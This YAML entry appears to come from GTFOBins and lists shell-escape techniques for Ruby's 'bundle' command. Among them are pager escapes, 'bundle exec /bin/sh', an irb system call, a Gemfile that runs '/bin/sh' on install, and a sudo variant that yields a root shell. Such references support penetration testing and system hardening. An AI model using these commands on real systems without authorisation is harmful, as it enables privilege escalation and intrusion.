--- functions: shell: - description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply. code: | bundle help !/bin/sh - code: | export BUNDLE_GEMFILE=x bundle exec /bin/sh - code: | TF=$(mktemp -d) touch $TF/Gemfile cd $TF bundle exec /bin/sh - description: This spawns an interactive shell via [`irb`](/gtfobins/irb/). code: | TF=$(mktemp -d) touch $TF/Gemfile cd $TF bundle console system('/bin/sh -c /bin/sh') - code: | TF=$(mktemp -d) echo 'system("/bin/sh")' > $TF/Gemfile cd $TF bundle install sudo: - description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply. code: | sudo bundle help !/bin/sh ---